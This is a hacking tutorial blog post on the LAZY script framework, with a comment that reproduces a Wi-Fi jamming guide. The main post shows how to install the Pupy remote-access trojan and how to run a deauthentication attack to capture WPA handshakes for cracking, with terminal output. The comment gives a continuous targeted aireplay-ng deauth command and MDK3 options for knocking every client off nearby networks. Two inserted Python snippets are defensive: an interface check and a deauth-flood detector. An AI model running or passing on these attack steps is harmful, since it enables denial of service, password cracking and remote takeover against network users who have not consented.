Hack Wi-Fi & Networks More Easily with Lazy Script

Anastasis

Wi-Fi tools keep getting more accessible to beginners, and the LAZY script is a framework that makes a collection of serious penetration-testing tools easy to explore from a single menu. This powerful and simple tool can be used for everything from installing new add-ons to grabbing a WPA handshake in a matter of seconds. Plus, it's easy to install, set up, and use.

 

Attack Frameworks

Most new Wi-Fi hacking tools rely on many of the same underlying attacks, and scripts that automate using other more familiar tools like Aireplay-ng are often referred to as frameworks. These frameworks try to organize tools in smart or useful ways to take them a step beyond the functionality or usability of the original program.

Excellent examples of this are programs that integrate scanning tools like Airodump-ng, attacks like WPS Pixie-Dust, and cracking tools like Aircrack-ng to create an easy-to-follow attack chain for beginners. Doing this makes the process of using these tools easier to remember and can be seen as a sort of guided tour. While each of these attacks is possible without the hand-holding, the result can be faster or more convenient than trying to do so yourself.

An example of this we've covered is the Airgeddon framework, a wireless attack framework that does useful things like automating the target selection process and eliminating the time a user spends copying and pasting information between programs. This saves valuable time for even experienced pentesters but has the disadvantage of preventing beginners from understanding what's happening "under the hood" of the attack. While this is true, most of these frameworks are fast, efficient, and dead simple to use, enabling even beginners to take on and disable an entire network.

UX/UI Improvements for Beginners

I'll be going through a new script that attempts to create a friendlier way for beginners to start using some of the best and most reliable hacking techniques. While the script is designed to be as "lazy" as possible by requiring a minimum of user interaction, it's also useful and powerful for beginners or experienced users looking to blast through a penetration test quickly.

The focus in attack frameworks is to anticipate better what the hacker will be trying to do and pull together the necessary tools to execute the attack with a minimum of interaction from the user. In this way, the user interface and experience become the primary goal, and the script has the purpose of anticipating the tools and tactics a penetration tester would need quick access to in the field.

The LAZY script is started by typing the letter l into a terminal window; on the first run, it asks for the names of your network interfaces. It uses the names you supply to connect to the tools needed to execute any attacks you select. Aside from that initial input, the majority of the possible attacks can be performed merely by choosing the option number from the menu. This means you can grab a network handshake or download a new hacking tool like Pupy by just selecting one of the menu options.

Extending Usability & Curating Applications

The benefit of the LAZY script is that it was built with penetration testers in mind. This means it's essentially a guided tour through some of the best and most potent scripts available today. Some of the most easily accessible menu options include quick access to networking information like the gateway IP (usually the router), your IP address, MAC address, and a scan function that executes an ARP scan to reveal all other devices on the network.

The primary sub-menus are also broken down by functions a pentester would want easy access to. The general focus is handshakes, WPS PIN attacks, WEP attacks, MitM attacks, and the Metasploit Framework. Anonsurf is also included for analyzing internet traffic, and social engineering attacks like email spoofing are provided. If you see a tool in red, it means you don't have it yet. To get it, you can select it and type install, and the script will do it for you.

Tool is not installed. To install it type 'install'.
install
Installing Dagon
Tool by Ekultek
Cloning into 'dagon'...
remote: Counting objects: 1236, done.
remote: Total 1236 (delta 0), reused 0 (delta 0), pack-reused 1235
Receiving objects: 100% (1236/1236), 319.35 KiB | 1.76 MiB/s, done.
Resolving deltas: 100% (666/666), done.
Collecting pysha3==1.0.2 (from -r requirements.txt (line 1))
Downloading https://files.pythonhosted.org/packages/c5/bb/7d793dfab828e01adb46e3c5976fe99acda12a954c728427cceb2acd7ee9/pysha3-1.0.2-cp27-cp27mu-manylinux1_x86_64.whl (127kB)
    100% |██████████████████████████████| 133kB 1.5MB/s
Requirement already satisfied: requests in /usr/lib/python2.7/dist-packages (from -r requirements.txt (line2))
Collecting colorlog==2.10.0 (from -r requirements.tx (line 3))
Downloading https://files.pythonhosted.org/packages/61/ff/d6337d488739c1a7ade37f736880e44717bcb0e7cea178c17774a4a93700/colorlog-2.10.0-py2.py3-none-any.whl
Requirement already satisfied: passlib=1.7.1 in /usr/lib/python2.7/dist-packages (from -r requirements.txt (line4))
Collecting bcrypt==3.1.3 (from -r requirements.txt (line 5))
Downloading https://files.pythonhosted.org/packages/a6/da/5d7ac371b4c9a8ac9e8ea62cff7c090e9d7d7b7ea3f2ad8b8c8da65db058/bcrypt-3.1.3-cp27-cp27mu-manylinux1_x86_64.whl (57kB)
    100% |██████████████████████████████| 61kB 9.9MB/s
Requirement already satisfied: six>=1.4.1 in /usr/lib/python2.7/dist-packages (from bcrypt==3.1.3->-r requirements.txt (line 5))
Collecting cffi>=1.1 (from bcrypt==3.1.3->-r requirements.txt (line 5))
Downloading https://files.pythonhosted.org/packages/14/dd/3e7a1e1280e7d767bd3fa15791759c91ec19058ebe31217fe66f3e9a8c49/cffi-1.11.5-cp27-cp27mu-manylinux1_x86_64.whl (407kB)
    100% |██████████████████████████████| 409kB 2.1MB/s
Collecting pycparser (from cffi>=1.1->bcrypt==3.1.3->-r requirements.txt (line 5))
Downloading https://files.pythonhosted.org/packages/8c/2d/aad7f16146f4197a11f8e91fb81df177adcc2073d36a17b1491fd09df6ed/pycparser-2.18.tar.gz (245kB)
    100% |██████████████████████████████| 256kB 2.8MB/s
Building wheels for collected packages: pycparser

Step 1: Update Kali Linux

To use the LAZY script, you'll need a fully updated version of Kali Linux. The script comes with a very helpful installer script, and I was able to set it up on both a laptop running Kali as its primary OS and a virtual machine with no problems.

If your Kali system is fully updated, you can generally expect a pretty smooth installation process. Make sure your system is up to date by running the following commands before getting started.

apt update
apt upgrade

Step 2: Find Your Wireless Network Adapter's Name

The script will ask you for the name of the network adapter you want to use, as well as the name your system gives that adapter when it's in monitor mode. This is where some troubleshooting may be needed. Usually, a Kali-compatible wireless adapter will be wlan0 or wlan1, and in monitor mode it is renamed to wlan0mon or wlan1mon. Sometimes, however, wlan0 stays wlan0 and isn't renamed when put into monitor mode, which means you'll need to set this in the LAZY script, or it will fail because it will try to use a wlan0mon interface that doesn't exist.

To check which name your adapter has once it is in monitor mode, run the following commands, with wlan0 as the name of your adapter, and look at the interface names in the output. The interface has to be brought down before iwconfig will change its mode.

ip link set wlan0 down
iwconfig wlan0 mode monitor
ip link set wlan0 up
ip a

Once you know the name of the adapter and the name it's changed to in monitor mode, we can get started downloading and using the "lazy" script.
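Because LAZY script fails when it is handed an interface name that does not exist, a small check that reads iw dev and reports which name is actually in monitor mode is worth having. This is an added example, not code from the post or from lscript; it assumes iw is installed for the live check and uses a constructed iw dev sample for the offline one.

```python
"""Resolve the interface name LAZY script should be given for monitor mode.

Added example, not part of the original post or the lscript project. It parses
the text that `iw dev` prints, so the check can run offline on a saved copy;
the sample below is constructed, not taken from a real machine.
"""
import re
import subprocess

# Constructed sample of `iw dev` output: wlan0 was switched to monitor mode but
# kept its name, so an assumed "wlan0mon" does not exist on this system.
SAMPLE_IW_DEV = """\
phy#0
\tInterface wlan0
\t\tifindex 3
\t\twdev 0x1
\t\taddr 00:11:22:33:44:55
\t\ttype monitor
\t\tchannel 6 (2437 MHz), width: 20 MHz, center1: 2437 MHz
phy#1
\tInterface wlan1
\t\tifindex 4
\t\twdev 0x100000001
\t\taddr 66:77:88:99:aa:bb
\t\ttype managed
"""


def parse_iw_dev(text):
    """Return {interface_name: type} from `iw dev` output ("managed", "monitor", ...)."""
    result = {}
    current = None
    for line in text.splitlines():
        m = re.match(r"\s*Interface\s+(\S+)", line)
        if m:
            current = m.group(1)
            result[current] = None
            continue
        m = re.match(r"\s*type\s+(\S+)", line)
        if m and current:
            result[current] = m.group(1)
    return result


def monitor_name_for(base, iw_output):
    """Name to enter for the monitor-mode interface of `base` (e.g. "wlan0").

    Prefers the airmon-ng style "<base>mon" when it exists, then falls back to
    `base` itself if the driver switched it to monitor mode without renaming,
    which is the case the post warns about. Returns None when neither is in
    monitor mode, so the caller can stop rather than hand LAZY script a name
    that does not exist.
    """
    types = parse_iw_dev(iw_output)
    for candidate in (base + "mon", base):
        if types.get(candidate) == "monitor":
            return candidate
    return None


def live_monitor_name(base):
    """Same check against the running system (needs `iw` installed)."""
    out = subprocess.run(["iw", "dev"], capture_output=True, text=True, check=True).stdout
    return monitor_name_for(base, out)


if __name__ == "__main__":
    print(monitor_name_for("wlan0", SAMPLE_IW_DEV))  # wlan0
    print(monitor_name_for("wlan1", SAMPLE_IW_DEV))  # None
```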

Step 3: Install & Configure Lazy Script

Installing the LAZY script is incredibly easy. Open a terminal window and paste in the commands below, one line at a time. They cd into your home directory (/root on Kali), clone the LAZY script from GitHub, cd into the lscript directory, give the install.sh file execute permissions, and then run the installer.

cd
git clone https://github.com/arismelachroinos/lscript.git
cd lscript
chmod +x install.sh
./install.sh

When this completes, you should be able to open a new terminal window and type the letter l to open LAZY script. You'll need to follow any prompts along the way, answering if you're installing the script for the first time or reinstalling it, and then setting the network interfaces. Not bad for a script that prides itself on minimal user interaction.

When setting the interfaces, you'll enter the name of your wireless network adapter in both managed and monitor mode, and then the name of your Ethernet adapter.

You can go back and change this by typing interface if you add another network adapter or want to switch between the internal and external network card. Once this is set, you can get to work using LAZY script.

Step 4: Use Basic Networking Tools

To begin, we can access data about the network we're currently connected to, as well as any network interfaces, from the main menu. Here, we can find local information by just typing l to pull up local IP information, as seen below.

Local IPs:
eth0 = 192.168.86.42

Gateways:
eth0 = 192.168.86.1
Press any key to go back...

This allows us to do things like scan the network for other devices. This part of LAZY script gives us better visibility on a network and situational awareness of what devices are around us. The main menu options break down as follows:

  • if - Runs ifconfig and gives the names and information about all network devices.
  • 1 - Enable wlan0 (d1 disables it).
  • 2 - Enable wlan0mon (d2 disables it).
  • 3 - Randomize or set the MAC address to a specific value.
  • 7 - View the public IP address your computer is leaving on sites you visit.
  • 19 - Look up the physical address of a given IP address to determine its approximate location.
  • scan - Start an ARP scan on the network to discover nearby devices.
  • start - Start monitor mode on the wireless network adapter.
  • stop - Stop wireless monitor mode on the network adapter.

Step 5: Install New Tools

Part of the fun of LAZY script is how easy it is to add new tools to our arsenal. To demonstrate this, let's download Pupy, a Python-based RAT designed to take control of other computers on the network. We can select option 9 to access the list of tools in LAZY script.

From the next menu, the tools are broken down into major categories, with options for managing the installation of scripts. The options presented are:

  • 1 - Wi-Fi tools (tools for attacking wireless networks).
  • 2 - Remote access (tools for getting remote access to other devices and remotely managing them).
  • 3 - Information gathering (collecting intelligence on people or websites).
  • 4 - Website tools (tools for exploiting or attacking sites).
  • 5 - Other (a miscellaneous collection of other hacking tools).

You can also manage your installed tools by accessing option 6. To download Pupy, we'll go to option 2, which is remote access. Here, we will see a list of different tools for remote access, and we can select option 3 for Pupy. Here, we can see Pupy is not installed because it appears in red.

To install Pupy, select 3, and when prompted, type install to have LAZY script manage the installation for you.

Tool is not installed. To install it type 'install'.
install
Installing Pupy
Tool by n1nj4sec
Cloning into 'pupy'...
remote: Counting objects: 16472, done.
remote: Compressing objects: 100% (35/35), done.
remote: Total 16472 (delta 20), reused 47 (delta 20), pack-reused 16416
Receiving objects: 100% (16472/16472), 27.77 MiB | 4.99 MiB/s, done.
Resolving deltas: 100% (11706/11706), done.

Once it's complete, the option should appear in green, and you will be able to use it through LAZY script. Now, we can select option 3, and immediately jump into Pupy to begin creating listeners and payloads.

1) Generate a payload
2) Start listener
b) Go back
00) Main menu
0) EXIT

We can now type 00 to go back to the main menu to explore some more of LAZY script's functions.

Step 6: Capture a WPA Handshake Through Lazy Script

The last feature of LAZY script I'll introduce is the quick-and-easy way of grabbing a WPA handshake for future cracking. This is useful if you want to hack a WPA network, which is by far the most common type of Wi-Fi network you'll find in use. Using this technique, you can quickly kick someone or something off the network you are targeting and capture the network handshake of the device reconnecting to the network.

With this handshake, you can crack the hash with a brute-force attack. This tried-and-true method is one of the most critical vulnerabilities in WPA and one of the significant things that was fixed in the new WPA3.

After returning to the main menu, we can try out one of LAZY script's top-menu functions, which is to capture a WPA (or WPA2) handshake for later cracking. If you have a Kali compatible wireless network adapter, you should have supplied this name to LAZY script in Step 3 above, or you can do so now by typing interfaces and setting the name of the adapter in station and monitor mode.

Once this is set, we can choose option 10 to open the handshake menu. First, you'll need to confirm that you want to put the adapter into monitor mode if you haven't already. Just type y to confirm and place the adapter into monitor mode. When this is done, a new terminal window will open. You'll see that no network is selected yet, along with a list of the attack options.

----------------------------HANDSHAKE----------------------------
 1) Scan networks nearby     Selected:None
 2) Capture handshake
 3) Aircrack the handshake
 4) Verify a handshake
 5) Clean a handshake
 6) Remove .csv and .netxml files
 0) Exit
Choose:

You can select option number 1 to scan for networks nearby, and you'll see a list of nearby network traffic. Let this run for a minute or two, and then press Ctrl-C to stop the scan.

CH 12 ][ Elapsed: 6 s ][ 2018-07-04 04:33

BSSID               PWR   Beacons   #Data,  #/s    CH    MB     ENC   CIPHER  AUTH  ESSID

00:25:00:FF:94:73    -1         0       1     0     6    -1     OPN                 <length:  0>
70:3A:CB:DB:5A:78   -41        11       3     0    11    130    WPA2  CCMP    PSK   takeyourgodd
70:3A:CB:DB:5C:A8   -59        22       0     0     6    130    WPA2  CCMP    PSK   takeyourgodd
70:3A:CB:DB:5C:B4   -71         6       0     0     1    130    WPA2  CCMP    PSK   takeyourgodd
C4:8E:8F:E5:6A:B4   -75         7       0     0     1    195    WPA2  CCMP    PSK   TG1672G12

BSSID               STATION         PWR   RATE      Lost    Frames  Probe

00:25:00:FF:94:73   obfuscated      -43    0 -12      21         8
00:25:00:FF:94:73   obfuscated      -33    0 -12     104         4
00:25:00:FF:94:73   obfuscated      -51    0 -12     107         4
00:25:00:FF:94:73   obfuscated      -53    0 -12      34         8
(not associated)    obfuscated      -70    0 - 1      12         8

You'll see a list of networks that have traffic on them, allowing you to find targets for the next stage of the attack. This comes along with a handy color code. Select the number of the target network and press return to continue. It's worth noting you can go back to this screen to select another network by typing b in any later step, saving you from needing to scan a second time.

After selecting our target network, we'll be presented with the option to either supply a file name to save the handshake to or choose 0 to not keep a file for this session. Here, name the file something you'll remember later.

After entering a name and pressing return, a new window will open presenting you with options for kicking devices off the network. Select option 1 to deauthenticate all clients and get the network handshake quickly. Make sure you have permission to do this on the network you're working on, as you'll be denying service to the network you target until you get the handshake. As a final input, select the number of deauth packets to send, with 0 being a continuous stream until you decide to quit.

----------------DEAUTH MENU----------------

 1) Deauth all                   aireplay-ng
 2) Deauth all                   mdk3
 3) Deauth client/s              aireplay-ng
 4) Deauth all periodically      aireplay-ng
 0) Exit
-------------------------------------------HANDSHAKE-------------------------------------------

CH 11 ][ Elapsed: 12 s ][ 2018-07-04 04:33

BSSID               PWR  RXQ  Beacons   #Data,  #/s  CH   MB   ENC    CIPHER  AUTH  ESSID

70:3A:CB:DB:5A:78   -40   87      134      92     6  11  130   WPA2   CCMP    PSK   takeyourgodd

BSSID               STATION         PWR     Rate      Lost  Frames  Probe

70:3A:CB:DB:5A:78   obfuscated      -72      0 - 0      22       6

A new window will open, showing the status of the deauthentication attack. When you see the "WPA handshake" appear in the top right corner, you know you've gotten the handshake for the network. Press Ctrl-C to stop the deauth attack.

----------------DEAUTH MENU----------------

 1) Deauth all                   aireplay-ng
 2) Deauth all                   mdk3
 3) Deauth client/s              aireplay-ng
 4) Deauth all periodically      aireplay-ng
ENTER) Last option
 0) Exit
-------------------------------------------HANDSHAKE-------------------------------------------

CH 11 ][ Elapsed: 2 mins ][ 2018-07-04 04:36 ][ WPA handshake: 70:3A:CB:DB:5A:78

BSSID               PWR  RXQ  Beacons   #Data,  #/s  CH   MB   ENC    CIPHER  AUTH  ESSID

70:3A:CB:DB:5A:78    -7  100     1307     151     2  11  130   WPA2   CCMP    PSK   takeyourgodd

BSSID               STATION         PWR     Rate        Lost  Frames  Probe

70:3A:CB:DB:5A:78   obfuscated      -33      1e - 1e       0      12
---------------------------------DEAUTHING---------------------------------

04:36:17 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78]
04:36:18 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78]
04:36:18 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78]
04:36:19 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78]
04:36:19 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78]
04:36:19 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78]
04:36:20 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78]
04:36:20 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78]
04:36:21 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78]
04:36:21 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78]
04:36:22 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78]
04:36:22 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78]
04:36:23 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78]
04:36:23 Sending DeAuth (code 7) to broadcast -- BBSID: [70:3A:CB:DB:5A:78]
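
A wireless IDS sees this stream from the other side: a burst of broadcast deauthentication frames with reason code 7 from a single BSSID, at a rate no access point produces on its own. The following is an added detection example, not code from the post or from LAZY script; the frames are constructed to mirror the log above, and the sliding-window size and threshold are assumptions to tune per site.

```python
"""Flag deauthentication floods such as the aireplay-ng stream shown above.

Added example for detection, not code from the original post or from LAZY
script. It works on deauth frames a monitor-mode sensor would record; the
sample is constructed to match the timestamps, broadcast destination and
reason code 7 in the log, not captured traffic.
"""
from collections import deque
from datetime import datetime, timedelta

BROADCAST = "ff:ff:ff:ff:ff:ff"

# Constructed sensor observations: (time, sending BSSID, destination, reason code).
# The first fourteen mirror the log above (two broadcast deauths per second,
# reason 7 = "class 3 frame from non-associated station"); the last one is a
# lone unicast deauth from another AP with reason 3 (station leaving), the kind
# of frame seen in normal operation.
SAMPLE_FRAMES = [
    ("04:36:17", "70:3a:cb:db:5a:78", BROADCAST, 7),
    ("04:36:18", "70:3a:cb:db:5a:78", BROADCAST, 7),
    ("04:36:18", "70:3a:cb:db:5a:78", BROADCAST, 7),
    ("04:36:19", "70:3a:cb:db:5a:78", BROADCAST, 7),
    ("04:36:19", "70:3a:cb:db:5a:78", BROADCAST, 7),
    ("04:36:19", "70:3a:cb:db:5a:78", BROADCAST, 7),
    ("04:36:20", "70:3a:cb:db:5a:78", BROADCAST, 7),
    ("04:36:20", "70:3a:cb:db:5a:78", BROADCAST, 7),
    ("04:36:21", "70:3a:cb:db:5a:78", BROADCAST, 7),
    ("04:36:21", "70:3a:cb:db:5a:78", BROADCAST, 7),
    ("04:36:22", "70:3a:cb:db:5a:78", BROADCAST, 7),
    ("04:36:22", "70:3a:cb:db:5a:78", BROADCAST, 7),
    ("04:36:23", "70:3a:cb:db:5a:78", BROADCAST, 7),
    ("04:36:23", "70:3a:cb:db:5a:78", BROADCAST, 7),
    ("04:37:05", "c4:8e:8f:e5:6a:b4", "aa:bb:cc:dd:ee:01", 3),
]


def detect_deauth_floods(frames, window_s=10, threshold=5):
    """Return {bssid: details} for senders that reach `threshold` deauth frames
    inside any sliding window of `window_s` seconds.

    A legitimate AP deauthenticates a client occasionally and almost always
    unicast; a sustained run of broadcast deauths from one BSSID is the
    signature of a forged stream. `window_s` and `threshold` are assumed
    starting values, not tuned figures.
    """
    recent = {}  # bssid -> deque of (time, is_broadcast, reason) inside the window
    alerts = {}
    for ts, bssid, dst, reason in frames:
        t = datetime.strptime(ts, "%H:%M:%S")  # same-day timestamps assumed
        q = recent.setdefault(bssid, deque())
        q.append((t, dst == BROADCAST, reason))
        while t - q[0][0] > timedelta(seconds=window_s):
            q.popleft()  # drop frames that fell out of the window
        if len(q) >= threshold and bssid not in alerts:
            alerts[bssid] = {
                "first_alert": ts,
                "frames_in_window": len(q),
                "broadcast_in_window": sum(1 for _, bcast, _ in q if bcast),
                "reason_codes": sorted({r for _, _, r in q}),
            }
    return alerts


if __name__ == "__main__":
    for bssid, info in detect_deauth_floods(SAMPLE_FRAMES).items():
        print(f"deauth flood from {bssid}: {info}")
```

Management Frame Protection (802.11w) is the control that stops clients from accepting forged deauths; where it is enabled, an alert like this records an attempt rather than a successful disconnection.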

After selecting the network, you'll be in the "handshake" menu. Here, we can confirm the handshake we just captured by selecting option 4 which is to verify a handshake.

----------------------------HANDSHAKE----------------------------
 1) Scan networks nearby     Selected:takeyourgoddamnshoesoff
 2) Capture handshake
 3) Aircrack the handshake
 4) Verify a handshake
 5) Clean a handshake
 6) Remove .csv and .netxml files
 0) Exit
Choose:

In the deauth menu, you'll see the options for verifying you've successfully captured a handshake. Select option 2 to check the handshake with Cowpatty.

-------DEAUTH MENU-------

 1) Check with pyrit
 2) Check with cowpatty
 b) Go back
Choose:
1
-------------------------------------------HANDSHAKE-------------------------------------------

CH 11 ][ Elapsed: 12 s ][ 2018-07-04 04:37

BSSID               PWR  RXQ  Beacons   #Data,  #/s  CH   MB   ENC    CIPHER  AUTH  ESSID

70:3A:CB:DB:5A:78   -40  100      156       0     0  11  130   WPA2   CCMP    PSK   takeyourgodd

BSSID               STATION         PWR     Rate        Lost  Frames  Probe

Here, you can see our handshake is valid:

-------DEAUTH MENU-------

Valid handshake found!
-------------------------------------------HANDSHAKE-------------------------------------------

CH 11 ][ Elapsed: 12 s ][ 2018-07-04 04:37

BSSID               PWR  RXQ  Beacons   #Data,  #/s  CH   MB   ENC    CIPHER  AUTH  ESSID

70:3A:CB:DB:5A:78   -37   96      297       0     0  11  130   WPA2   CCMP    PSK   takeyourgodd

BSSID               STATION         PWR     Rate        Lost  Frames  Probe

After confirming the handshake is valid, you'll be dropped back into the handshake menu. Select option 0 to exit the script.

----------------------------HANDSHAKE----------------------------
 1) Scan networks nearby     Selected:takeyourgoddamnshoesoff
 2) Capture handshake
 3) Aircrack the handshake
 4) Verify a handshake
 5) Clean a handshake
 6) Remove .csv and .netxml files
 0) Exit
Choose:

On your way out, the script will ask if you captured a WPA handshake. If you did, make sure to type y to save the handshake you captured under the filename you provided earlier. Otherwise, the file will be discarded. If you're keeping the file, you can also type y for cleaning the file, which will make it smaller by getting rid of all the non-relevant packets that were captured.

At this point, we would run a brute-force attack against this with Aircrack-ng. I tried LAZY script's built-in brute forcer, but it wasn't able to properly read the location of my dictionary file, so I don't recommend it in its current iteration.

Step 7: Use a WPS Pixie-Dust Attack (A Work in Progress)

While LAZY script does include a WPS module, the versions I tried in virtual machines and on a Kali laptop weren't able to successfully crack our test WPS PIN. Two of the primary attacks returned "too many arguments" rather than any useful results. The final option, a Pixie-Dust loop, ended in an error after an anticlimactic buildup.

Network Hacking for the Lazy

LAZY script is a tool that attempts to bring together the best tools with a minimum of interaction, stitching together popular hacking tools with a series of clever shell scripts. This makes the necessary tactics of Wi-Fi hacking, such as WPA brute-forcing, accessible to even the most inexperienced users.

If you've become lazy with your Wi-Fi security at home, this is a wakeup call that you need to take things like setting your Wi-Fi password seriously. Don't pick a password which is short or easy to guess or one that you've already used in many other places. If you need a refresher on how to keep your own Wi-Fi safe, you can check out my previous guide on defending against the main types of Wi-Fi hacking, most of which LAZY script includes.

  • Μηνύματα

    • Anastasis
      You may have heard of a signal jammer before, usually referring to a device that blasts out a strong enough radio signal to drown out the reception of nearby devices like cell phones. Purpose-built jammer hardware is outright illegal in many countries, but Wi-Fi is vulnerable to several different jamming attacks that can be done with Kali Linux and a wireless network adapter. Traditional signal jamming has been a cat and mouse game of detecting and disabling signals an opponent is using to communicate. Cutting off a target's ability to communicate leaves them isolated and vulnerable, making jamming these signals a top priority in modern day electronic warfare. Countries today have developed capabilities to jam and spoof cell phones, GPS, Wi-Fi, and even satellite links. Different Types of Jamming There are two main types of jammers: elementary and advanced. Here, we'll be discussing elementary Wi-Fi jamming, focusing on unencrypted management frames. Elementary jammers can be broken into two main types: proactive and reactive. The first type, a proactive jammer, is one that continuously functions whether there is traffic on a network or not. We'll be using MDK3 as a deceptive jammer, which injects normal-seeming packets that have a malicious effect on the network. Image by Justin Meyers/Null Byte Jammers used in electronic warfare typically require equipment that overwhelms the signal of the target with radio energy, making it impossible to distinguish between the signal and the noise being introduced to the channel the target is using to communicate. This kind of jamming is popular because it works, but it also requires specialized equipment that is banned or heavily regulated in most countries. Another type of jamming attempts to send messages that force the target to be disconnected from the network they are connected to, rather than drowning out a target's signal by trying to overwhelm it. 
You might think this kind of attack might only work if you are connected to the network, but this is where WPA has a severe flaw. Because so-called management frames are not encrypted, it is possible to send disruptive messages from outside the network which causes people inside the network to be unable to connect. Deauthentication Packets The most common way this sort of attack is done is with deauthentication packets. These are a type of "management" frame responsible for disconnecting a device from an access point. Forging these packets is the key to hacking many Wi-Fi networks, as you can forcibly disconnect any client from the network at any time. The ease of which this can be done is somewhat frightening and is often done as part of gathering a WPA handshake for cracking. Aside from momentarily using this disconnection to harvest a handshake to crack, you can also just let those deauths keep coming, which has the effect of peppering the client with deauth packets seemingly from the network they are connected to. Because these frames aren't encrypted, many programs take advantage of management frames by forging them and sending them to either one or all devices on a network. Don't Miss: Disable Security Cams on Any Wireless Network with Aireplay-ng Programs like Aireplay-ng rely on deauthentication packets to execute denial of service attacks, and this kind of tactic is often a part of the first WPA brute-forcing a hacker will learn. Spamming a target with deauth packets is simple but effective, often producing near-immediate action on the mark. But many who use Aireplay-ng may not know that there is another kind of management frame that can be abused to take out clients on a WPA network. Dissasociation Packets Disassociation packets are another type of management frame that is used to disconnect a node (meaning any device like a laptop or cell phone) from a nearby access point. 
The difference between deauthentication and disassociation frames is primarily the way they are used. An AP looking to disconnect a rogue device would send a deauthentication packet to inform the device it has been disconnected from the network, whereas a disassociation packet is used to disconnect any nodes when the AP is powering down, rebooting, or leaving the area. Different networks may be equipped with different countermeasures, so deauthentication itself may not work. In fact, WPA3 protects against this attack, as do some types of WPA2. According to the Wi-Fi Alliance website: Because of this, deauthentication and disassociation attacks are just one of many which may be employed against a Wi-Fi network. While there are more advanced jamming attacks based on interrupting CTS (clear to send) or data packets, we'll save those attacks for another guide. For now, we'll start using a mix of deauthentication and disassociation to increase our chances of persistently taking out a network. MDK3 vs. Aireplay-ng To understand Aireplay-ng vs MDK3 as jamming tools, we should take a look at the help file for each tool. For Aireplay-ng, we see the following relevant information. 
Aireplay-ng 1.2 rc4 - (C) 2006-2015 Thomas d'Otreppe http://www.aircrack-ng.org usage: aireplay-ng <options> <replay interface> Filter options: -b bssid : MAC address, Access Point -d dmac : MAC address, Destination -s smac : MAC address, Source -m len : minimum packet length -n len : maximum packet length -u type : frame control, type field -v subt : frame control, subtype field -t tods : frame control, To DS bit -f fromds : frame control, From DS bit -w iswep : frame control, WEP bit -D : disable AP detection Attack modes (numbers can still be used): --deauth count : deauthenticate 1 or all stations (-0) --fakeauth delay : fake authentication with AP (-1) --interactive : interactive frame selection (-2) --arpreplay : standard ARP-request replay (-3) --chopchop : decrypt/chopchop WEP packet (-4) --fragment : generates valid keystream (-5) --caffe-latte : query a client for new IVs (-6) --cfrag : fragments against a client (-7) --migmode : attacks WPA migration mode (-8) --test : tests injection and quality (-9) --help : Displays this usage screen While the tools included are interesting, only --deauth is helpful in jamming a Wi-Fi connection. Based on these filter settings, we can use Aireplay-ng to attack specific nodes on specific APs. We can do so with a command like below. aireplay-ng -0 0 -a f2:9f:c2:34:55:69 -c a4:14:37:44:1f:ac wlan0mon This command uses the wlan0 interface in monitor mode to send an unlimited stream of deauths to the client at MAC address a4:14:37:44:1f:ac which is connected to the access point with a MAC address of f2:9f:c2:34:55:69. This attack is surgical and usually starts working immediately, but can fail or not be very effective on some networks. MDK3, by comparison, has less surgical filters listen in its help file. MDK 3.0 v6 - "Yeah, well, whatever" MDK is a proof-of-concept tool to exploit common IEEE 802.11 protocol weaknesses. 
MDK USAGE: mdk3 <interface> <test_mode> [test_options] TEST MODES: b - Beacon Flood Mode Sends beacon frames to show fake APs at clients. This can sometimes crash network scanners and even drivers! a - Authentication DoS mode Sends authentication frames to all APs found in range. Too many clients freeze or reset some APs. p - Basic probing and ESSID Bruteforce mode Probes AP and check for an answer, useful for checking if SSID has been correctly decloaked or if AP is in your adaptors sending range SSID Bruteforcing is also possible with this test mode. d - Deauthentication / Disassociation Amok Mode Kicks everybody found from AP m - Michael shutdown exploitation (TKIP) Cancels all traffic continuously x - 802.1X tests w - WIDS/WIPS Confusion Confuse/Abuse Intrusion Detection and Prevention Systems f - MAC filter bruteforce mode This test uses a list of known client MAC Adresses and tries to authenticate them to the given AP while dynamically changing its response timeout for best performance. It currently works only on APs who deny an open authentication request properly g - WPA Downgrade test deauthenticates Stations and APs sending WPA encrypted packets. With this test you can check if the sysadmin will try setting his network to WEP or disable encryption. With MDK3, we see a few attractive options. Option g will attempt to force a network administrator to disable or downgrade encryption by targeting any connection sending WPA encrypted packets with deauthentication attacks. Option b attempts a beacon flood attack, randomly creating fake APs in the area, and option a attempts to jam a network by sending too many authentication frames. Neither of these attacks works for jamming the network, so instead, the most useful attack is option d. The Deauthentication / Disassociation Amok Mode attack by default kicks everyone off of any nearby network, but with some filters, we can get it to behave more surgically. 
What You'll Need

To get started, you'll need a fully updated copy of Kali Linux and a Kali-compatible wireless network adapter, meaning one that supports monitor mode and packet injection. If you need help choosing one, you can check out our guide below. To update your copy of Kali Linux, connect to the internet, open a terminal window, and run the commands below.

apt update
apt upgrade

Step 1: Install MDK3

Kali includes MDK3 by default, but if you don't have it installed, you can do so by typing the following.

apt install mdk3

Once this is installed, you can type mdk3 --help to see the main options.

Step 2: Jam an Area

Taking a look at the filter options for MDK3, we can type mdk3 --help d to get the help information for the deauthentication module specifically. Here we can see that its options differ from those of Aireplay-ng. Instead, we have the following options to craft our attack.

-w: a file of MAC addresses to ignore (whitelist).
-b: a file of MAC addresses to attack (blacklist).
-s: the speed (packets per second) of the attack.
-c: the channel, or channels, to run the attack on.

Based on these options, at the very minimum we need one piece of information to start jamming anything: the name of our network adapter in monitor mode, which MDK3 needs in order to run. To find the adapter's name, type either ifconfig or the newer ip a in a terminal window; it should be something like "wlan0" or "wlan1." When you have the name of the device, you can put it into monitor mode with the following airmon-ng command, where wlan0 is the name of your network card.

sudo airmon-ng start wlan0

